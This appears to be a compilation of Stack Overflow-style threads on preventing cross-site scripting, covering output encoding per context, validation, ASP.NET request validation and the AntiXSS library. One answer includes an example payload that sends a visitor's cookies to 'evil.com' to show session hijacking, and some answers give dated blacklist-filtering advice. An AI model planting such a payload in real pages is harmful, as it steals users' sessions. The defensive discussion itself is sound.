If I HTML-encode any data entered by website users when I redisplay it, will this prevent XSS vulnerabilities?
Also, is there a tool/product available that will sanitize my user input for me, so that I don't have to write my own routines?
There are various subtleties to this question, although the answer in general is yes.
The safety of your website is highly dependent on where you put the data. If you put it as legit text, there is essentially no way for the attacker to execute XSS. If you put it in an attribute, if you forget to escape quotes or don't check for multibyte well-formedness, you have a possible attack. If you put it in a JSON variable, not escaping properly can lead to arbitrary JavaScript. Etc. etc. Context is very important.
Other users have suggested using XSS-removal or XSS-detection functions. I tend to think of XSS removal as user-unfriendly; if I post an email address like <foo@example.com> and your XSS-removal function thinks it's an HTML tag, that text mysteriously disappears. If I am running an XSS discussion forum, I don't want people's sample code to be removed. Detection is a little more sensible; if your application can tell when someone is attacking it, it can ban the IP address or user account. You should be careful with this sort of functionality, however; innocents can and will get caught in the crossfire.
Validation is an important part of website logic, but it's also independent of escaping. If I don't validate anything but escape everything, there will be no XSS attacks, but someone can say that their birthday is "the day the music died", and the application wouldn't be the wiser. In theory, strict enough validation for certain data types can perform all the duties of escaping (think numbers, enumerations, etc.), but it's generally good practice of defense in depth to escape them anyway. Even if you're 100% sure it's an integer, it might not be.
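A minimal Python sketch of that defense-in-depth point (the `render_age` helper is hypothetical, not from any answer above): validate the type strictly, then escape on output anyway.

```python
import html

# Hypothetical sketch: validate first, then escape on output anyway
# (defense in depth).
def render_age(raw_value: str) -> str:
    age = int(raw_value)           # validation: raises ValueError for non-integers
    if not 0 < age < 150:
        raise ValueError("implausible age")
    return html.escape(str(age))   # escaping: redundant for a real int, but free

print(render_age("42"))  # -> 42
```

The escape is a no-op for a genuine integer, which is exactly why keeping it costs nothing.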
Escaping plaintext is a trivial problem; if your language doesn't give you a function, a string replace for <, >, ", ' and & with their corresponding HTML entities will do the trick. (You need other HTML entities only if you're not using UTF-8). Allowing HTML tags is non-trivial, and merits its own Stack Overflow question.
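A minimal sketch of that string-replace approach in Python (the helper name `escape_html` is my own). The one subtlety is that `&` must be replaced first, or you double-escape the entities you just produced:

```python
def escape_html(text: str) -> str:
    # Replace & first; otherwise the & inside "&lt;" etc. would be re-escaped.
    for ch, entity in (("&", "&amp;"), ("<", "&lt;"), (">", "&gt;"),
                       ('"', "&quot;"), ("'", "&#x27;")):
        text = text.replace(ch, entity)
    return text

print(escape_html('<img src=x onerror="alert(1)">'))
# -> &lt;img src=x onerror=&quot;alert(1)&quot;&gt;
```

In practice Python already ships this as `html.escape`; the loop above just makes the replacement order explicit.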
Encoding your HTML is a start, but it does not protect from all XSS attacks.
If you use PHP, here is a good function you can use in your sites: Kallahar's RemoveXSS() function
If you don't use PHP, at least the code is well commented, explaining the purpose of each section, and could then be adapted to another programming language.
The answer is no, encoding is not enough. The best protection for XSS is a combination of "whitelist" validation of all incoming data and appropriate encoding of all output data. Validation allows the detection of attacks, and encoding prevents any successful script injection from running in the browser. If you are using .NET you can check this library: http://msdn.microsoft.com/en-us/library/aa973813.aspx
You can check also some Cheat sheets to test your protections: http://ha.ckers.org/xss.html
Regards,
Victor
HtmlEncoding input gets you a good portion of the way by not allowing the HTML to render to the page.
Depending on your language, built-in helpers should exist to encode the data. In .NET you can use Server.HtmlEncode(txtInput.Text) to encode data from a textbox named txtInput.
As others have mentioned more items are needed to be truly protected.
Related
I understand why incoming data must be sanitized before it is saved to the database.
Why must I escape data I already have, prior to rendering it for the end user? If data originates from my own database and I have already validated and sanitized it, then surely it is already secure?
http://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data#Escaping:_Securing_Output
Because if you do not you could be making your site vulnerable to XSS.
Data is displayed to users via a combination of HTML and JavaScript; if you do not escape, user-supplied JavaScript could be output to the page and executed (rather than simply displayed, as it is on Stack Overflow).
e.g. if incoming data is saved into your database, it may still contain JavaScript code within the HTML. e.g. <script>document.location="evil.com?" + escape(document.cookie)</script>
This would have the effect of redirecting whichever user views the page to www.evil.com, passing along all cookies (which could include the session ID of the user, compromising the user's session via session hijacking). However, this is often done in a more subtle fashion so the user is not aware that they are being attacked, such as setting the URL of an <img> tag to pass along the cookies, or even embedding a keylogger within the page.
Escaping needs to be done per output context, so it must be done on output rather than on input. Examples of output contexts are HTML, JavaScript, and CSS, and they all have their own escaping (encoding) rules that must be followed to ensure your output is safe. e.g. & in HTML is encoded as &amp;, whilst in a JavaScript string it should be encoded as \x26. This will ensure the character is correctly interpreted by the language as the literal rather than as a control character.
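A small Python sketch of context-sensitive encoding: `html.escape` for the HTML context, and `json.dumps` as a stand-in encoder for a JavaScript string-literal context (it handles quotes and backslashes, though not every subtlety, e.g. a literal `</script>` sequence inside a script block):

```python
import html
import json

user = 'x"; alert(document.cookie); //'

html_safe = html.escape(user)  # for an HTML body or quoted-attribute context
js_safe = json.dumps(user)     # for a JavaScript string-literal context

print('<p>' + html_safe + '</p>')     # the quote becomes &quot;
print('var name = ' + js_safe + ';')  # the quote becomes \"
```

The same `"` character gets a different escape in each context; using the wrong one is exactly how context-confusion XSS happens.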
Please see the OWASP XSS Prevention Cheat Sheet for more details.
Escaping data you believe is safe may sound like a "belt and suspenders" kind of approach, but in an environment like WordPress you need to do it. It's possible a vulnerability in a third-party plugin or theme would let someone change the data in your database. And the plugin infrastructure means other code might have had the chance to modify your data before you go to render it in the theme. Filtering your output doesn't add any real overhead to rendering the page, starts to become natural to include in your code, and helps ensure you're not letting someone inject anything unwanted into your page.
It's not as huge of a risk as forgetting input validation (well okay maybe let's say "not as vulnerable to script kiddies but still a huge risk if you piss off someone smart"), but the idea is you want to prevent cross site scripting. This article does a nice job giving you some examples. http://www.securityninja.co.uk/secure-development/output-validation/
I need to sanitise user input (or output) for a web app I'm developing. The user input is just plain text, and I want to prevent HTML or other "harmful" strings. However characters such as less than, greater than, apostrophes, ampersands, quotes, etc., should be allowed.
I guess the first step is to disable request validation to prevent the generic "a potentially dangerous value was detected" message, but what else do I need to do? I can't simply HTML-encode the output, otherwise I'll end up with &lt; being displayed in place of a less-than character, for example.
Are there any tools that can help? I had a quick look at the AntiXSS library but from what I've seen it's just a glorified htmlencoder, or am I missing something? What about MVC - does this have anything built in?
I've never found a decent article on this kind of thing. Some say to sanitise input, while others say to sanitise output, and examples are typically over-simplistic, using techniques like HTML encoding, which will reformat perfectly valid characters such as a less-than sign.
The Anti-XSS library is the standard library in ASP.NET WebForms for now, though it is suboptimal, and the latest version (4.2) has several breaking bugs that haven't been fixed in a while.
Also see the MSDN article Information Security - Anti-Cross Site Scripting.
See Should I use the Anti-XSS Security Runtime Engine in ASP.NET MVC? for your answer regarding MVC. From that answer:
Phil Haack has an interesting blog post here
http://haacked.com/archive/2009/02/07/take-charge-of-your-security.aspx.
He suggests using Anti-XSS combined with CAT.NET.
My colleagues and I have been debating how to best protect ourselves
from XSS attacks but still preserve HTML characters that get entered
into fields in our software.
To me, the ideal solution is to accept the data (turn off ASP .NET
request validation) as the user enters it, throw it in the database
exactly as they entered it. Then, whenever you display the data on the
web, HTML-encode it. The problem with this approach is that there's a
high likelihood that a developer somewhere someday will forget to
HTML-encode the display of a value somewhere. Bam! XSS vulnerability.
Another solution that was proposed was to turn request validation off
and strip out any HTML users enter before it is stored in the database
using a regex. Devs will still have to HTML-encode things for display,
but since you've stripped out any HTML tags, even if a dev forgets, we
think it would be safe. The drawback to this is that users can't enter
HTML tags into descriptions and fields and things, even if they
explicitly want to, or they may accidentally paste in an email address
surrounded by < > and the regex doesn't pick it up...whatever. It
screws with the data, and it's not ideal.
The other issue we have to keep in mind is that the system has been
built in the fear of commitment to any one strategy around this. And
at one point, some devs wrote some pages to HTML encode data before it
gets entered into the database. So some data may be already HTML
encoded in the database, some data is not - it's a mess. We can't
really trust any data that comes from the database as safe for display
in a browser.
My question is: What would be the ideal solution if you were
building an ASP .NET web app from the ground up, and what would be a good
approach for us, given our situation?
Assuming you go ahead and store the HTML directly in the database, in ASP.NET/MVC Razor, HTML-encoding is done automatically, so your negligent developer would have to really go above and beyond the call of duty to introduce the XSS. With standard webforms (or the webform view engine), you can force developers to use the <%: syntax, which will accomplish the same thing. (albeit with more risk that the developer will be negligent)
Furthermore, you could consider only selectively disabling request validation. Do you really need to support it for every request? The vast majority of requests, presumably, would not need to preserve (or allow) the HTML.
Using a regex to strip html is fairly easy to defeat and very difficult to get correct. If you want to clean HTML input it's better to use an actual parser to enforce strict XML compliance.
What I would do in this situation is store two fields in the database: clean and raw for the data. When the user wants to edit their content, you send them the raw data. When they submit changes, you sanitize it and store it in the clean field. Developers then only ever use the clean field when outputting the content to the page. I would even go so far as to name the raw field dangerousRawContent so it's obvious that care must be taken when referencing that field.
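A Python sketch of that two-field idea (the field names and the dict-as-database are illustrative, and plain HTML-escaping stands in for the sanitize step):

```python
import html

def save_content(db: dict, record_id: int, raw: str) -> None:
    db[record_id] = {
        "dangerous_raw_content": raw,       # only ever sent back to the edit form
        "clean_content": html.escape(raw),  # the only field templates may render
    }

db = {}
save_content(db, 1, "<script>alert(1)</script>")
print(db[1]["clean_content"])  # -> &lt;script&gt;alert(1)&lt;/script&gt;
```

Because the raw original is preserved, swapping in a better sanitizer later is just a matter of re-running it over `dangerous_raw_content`.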
The added benefit of this technique is that you can re-sanitize the raw data with improved parsers at a later date without ever losing the originally intended content.
I have many params making up an insert form for example:
x.Parameters.AddWithValue("@city", City.Text)
I had a failed XSS attack on the site this morning, so I am trying to beef up security measures anyway.
Should I be adding my input params like this?
x.Parameters.AddWithValue("@city", HttpUtility.HtmlEncode(City.Text))
Is there anything else I should consider to avoid attacks?
Don't encode input. Do encode output. At some point in the future, you might decide you want to use the same data to produce PDF or a Word document (or something else), at which point you won't want it to be HTML.
When you are accepting data, it is just data.
When you are inserting data into a database, it needs to be converted to make sense for the database.
When you are inserting data into an HTML document, it needs to be converted to make sense for HTML.
… and so on.
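The same idea sketched in Python with sqlite3: the stored data stays raw, and each boundary applies its own conversion (a bound parameter for the database, `html.escape` for the page). Names here are illustrative.

```python
import html
import sqlite3

city = "O'Fallon <b>"

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (city TEXT)")
# Database boundary: a bound parameter, not string concatenation.
conn.execute("INSERT INTO users (city) VALUES (?)", (city,))

stored = conn.execute("SELECT city FROM users").fetchone()[0]
print(stored)               # raw, exactly as entered
print(html.escape(stored))  # HTML encoding happens only at output time
```

Because the database holds the untouched value, the same row can later feed a PDF or Word export with a different (or no) encoding.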
I strongly recommend looking at the OWASP XSS Prevention Cheat Sheet. It helps classify the different areas of an HTML document you can inject into, and gives a recipe for how to encode your output appropriately for each location.
Know that you can't just universally trust a function like htmlEncode() and expect it to be a magic pill for all ills. To quote from the OWASP document linked:
Why Can't I Just HTML Entity Encode Untrusted Data?
HTML entity encoding is okay for untrusted data that you put in the body of the HTML document, such as inside a <div> tag. It even sort of works for untrusted data that goes into attributes, particularly if you're religious about using quotes around your attributes. But HTML entity encoding doesn't work if you're putting untrusted data inside a <script> tag anywhere, or an event handler attribute like onmouseover, or inside CSS, or in a URL. So even if you use an HTML entity encoding method everywhere, you are still most likely vulnerable to XSS. You MUST use the escape syntax for the part of the HTML document you're putting untrusted data into. That's what the rules below are all about.
Take time to understand exactly how and why XSS works. Then just follow these 7 rules and you'll be safe.
I'm creating an ASP.NET program UI where users can browse and change information in a database. For this reason, they need to be able to use all forms of chars, but I still need to keep the program's HTML and SQL secure. For that reason, I'm using a self-built method that replaces dangerous chars such as '<' etc. with their HTML codes while they're being handled outside of a textbox (the replacement is done on page load, so the chars have no functionality there).
Now my dilemma: to be able to do this, I have to disable the ValidateRequest parameter; otherwise, as per the topic, the program will issue a complaint. What are the possible consequences of setting it to False?
The SQL query is parameterized already, and I filter out the following marks only:
& # < > " ' % @ =
Question: am I leaving the program open to threats even if I handle the chars above? Basically, this is an intranet application where only a few people will be able to access the program. Nevertheless, the information it accesses is fairly important, so even unintentional mishaps should be prevented. I literally have no idea what the ValidateRequest thing even does.
Edit: Alright, thanks for the answers. I'll just go with this then, as initially planned.
The main things ValidateRequest is looking for are < and > characters, to stop you opening your site up to malicious users posting script and/or HTML to your site.
If you're happy with the code you've got stripping out HTML mark-up, or you are not displaying the saved data back to the website without processing, then you should be ok.
Basically, validating user input by replacing special characters usually causes more trouble than it solves. It all depends on what the user will input; sometimes they legitimately need special characters like
& # < > " ' % @ =
Think about it: savvy users could still use xp_ commands or even the CONVERT() function to mount an automated ASCII/binary attack. As long as you parameterize all input, it should be OK.
I think that the problem is not only SQL injection attacks, but also Cross-Site Scripting and JS execution attacks.
To prevent these, you cannot rely on parameterized queries alone; you should also "sanitize" the HTML the user sends! Maybe a tool like HTML Tidy could help.